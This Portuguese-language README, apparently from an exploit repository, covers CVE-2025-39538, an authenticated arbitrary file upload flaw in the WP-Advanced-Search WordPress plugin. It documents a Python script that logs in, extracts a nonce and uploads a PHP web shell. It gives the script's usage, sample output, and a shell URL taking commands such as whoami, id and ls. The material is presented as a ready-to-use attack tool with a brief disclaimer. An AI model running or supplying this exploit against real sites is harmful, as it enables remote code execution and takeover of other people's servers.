
WordPress WP-Advanced-Search <= 3.3.9.3 - Vulnerabilidade de Upload Arbitrário de Arquivos
CVE-2025-39538
Publicado: 2025-04-16
Tipo de Vulnerabilidade: Upload Arbitrário de Arquivos (Upload sem Restrições de Arquivo com Tipo Perigoso)
Plugin Afetado: WP-Advanced-Search por Mathieu Chartier
Versões Afetadas: Todas as versões até e incluindo 3.3.9.3
Essa vulnerabilidade permite que um atacante autenticado envie um arquivo PHP malicioso (como um web shell) para o servidor usando a funcionalidade de importação fornecida pelo plugin. O arquivo enviado é colocado no diretório de uploads do WordPress e pode levar à execução remota de código.
🧱 Caminho de upload:
wp-content/uploads/2025/04/
Este script Python realiza as seguintes ações:
wp_advanced_search_up_nonce necessário da página de administração de importação/exportação.uso: a.py [-h] -u URL -un USERNAME -p PASSWORD
CVE-2025-39538 - WP Advanced Search Upload Arbitrário de Arquivos Exploit # Por Nxploited (Khaled Alenazi)
opções:
-h, --help mostra esta mensagem de ajuda e sai
-u, --url URL URL do WordPress alvo (ex.: http://127.0.0.1/wordpress)
-un, --username USERNAME
Nome de usuário do WordPress
-p, --password PASSWORD
Senha do WordPress
[*] Tentando login...
[+] Login bem-sucedido.
[*] Obtendo nonce da página de importação/exportação...
[+] Nonce extraído: 2140855687
[*] Tentando enviar shell...
[+] Arquivo enviado (verifique wp-content/uploads ou diretório temporário).
Após o upload, você pode acessar seu shell assim:
http://target.site/wp-content/uploads/2025/04/nxploit.php?cmd=whoami
Substitua whoami por qualquer comando Linux que deseje executar, por exemplo:
id — mostra o ID do usuário atual.pwd — mostra o diretório atual.ls — lista arquivos.Esta ferramenta é destinada apenas para fins educacionais e testes de segurança autorizados.
O autor não se responsabiliza por qualquer uso indevido ou dano causado por este script.
Por: Nxploited | Khaled Alenazi